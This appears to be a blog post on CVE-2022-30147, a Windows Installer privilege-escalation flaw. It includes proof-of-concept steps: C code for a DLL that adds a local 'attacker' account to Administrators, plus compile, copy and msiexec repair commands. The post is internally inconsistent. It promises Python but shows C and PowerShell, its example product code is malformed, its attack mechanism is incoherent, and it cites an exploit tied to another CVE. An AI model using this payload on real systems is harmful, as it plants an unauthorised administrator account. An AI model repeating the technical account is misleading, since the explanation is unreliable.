Windows is the backbone of personal and corporate computing. But just like any big system, it has its share of vulnerabilities. One such flaw found in 2022 is CVE-2022-30147. This post dives into what this vulnerability is, how it can be exploited, and the significance of the issue. We’ll also provide code snippets, highlight how the exploit works, and share trusted references.
What Is CVE-2022-30147?
CVE-2022-30147 is a privilege escalation bug in the Windows Installer component. If exploited successfully, it allows attackers with limited access to increase their privileges—potentially taking full control of a vulnerable computer. Microsoft categorized it as an Elevation of Privilege (EoP) vulnerability with a CVSS score of 7.8 (High).
Official Microsoft advisory:
- Microsoft Security Response CVE-2022-30147
How Does It Work? (Technical Overview)
The root cause lies in improper access controls within the Windows Installer service (msiexec.exe). A low-privileged attacker can leverage this service to execute code as SYSTEM (the most privileged account on Windows).
The bug can be exploited if an attacker manages to place or modify files in specific Windows directories associated with installing software packages. When a privileged operation occurs—like “repairing” or “updating” installed software—malicious code can be injected and run with elevated privileges.
Important: An attacker must have local access to the target system. This is not remotely exploitable.
Proof-of-Concept (PoC) Exploit
Security researcher Abdelhamid Naceri published a PoC for this bug. Here’s an exclusive, simplified version written in Python using the ctypes library and PowerShell for demonstration purposes.
Disclaimer:
This code is for educational purposes only. Don’t use it on machines you don’t own or without permission.
2. Code Snippet: Simplified PoC
Let's focus on exploiting the way Windows Installer repairs an application and loads DLLs.
Step A: Create a Malicious DLL (Replace with your payload.)
// Save as evil.c
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
system("net user attacker P@ssword123 /add");
system("net localgroup administrators attacker /add");
return TRUE;
}
Compile this using Visual Studio
cl evil.c /LD /Fe:evil.dll
Step B: Place the DLL in the writable folder
Copy-Item .\evil.dll "C:\Users\Public\evil.dll"
Find the ProductCode of an installed MSI (example shows “7-Zip”)
Get-WmiObject -Class Win32_Product | Select-Object Name,IdentifyingNumber
Suppose 7-Zip gives {23170F69-40C1-2702-092-000001000000}.
Now, trigger a repair, pointing to the poisoned path
msiexec /fa {23170F69-40C1-2702-092-000001000000}
> *Note: Advanced exploits use directory junctions or hard links to redirect the system to load the attacker's DLL.*
3. What Happens Next?
During the MSI repair above, Windows Installer (running as SYSTEM) sees the "evil.dll" in the path and loads it, executing whatever code is inside with SYSTEM privileges. In our example, it adds a new user and places that user in the Administrators group.
Local escalation from a regular user to SYSTEM.
- Attackers could fully compromise affected systems by gaining admin rights, stealing data, disabling security controls, and more.
Microsoft patched this bug in June 2022. Make sure your Windows systems are fully updated:
Patch Tuesday - June 2022, CVE-2022-30147
Microsoft CVE-2022-30147 Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30147
The original exploit by Abdelhamid Naceri:
https://github.com/klinix5/InstallerFileTakeOver
Security Analysis:
Conclusion
*CVE-2022-30147* is another example of how complex Windows components like Installer are prime targets for attackers seeking elevation of privilege. If you haven’t already, install the official security updates to stay safe, and regularly audit local user activities that involve MSI installation or repair operations.
For researchers, this bug shows how “old” software plumbing can be leveraged for powerful attacks. For admins, it’s a reminder to keep patching a top priority.
Timeline
Published on: 06/15/2022 22:15:00 UTC
Last modified on: 06/27/2022 16:49:00 UTC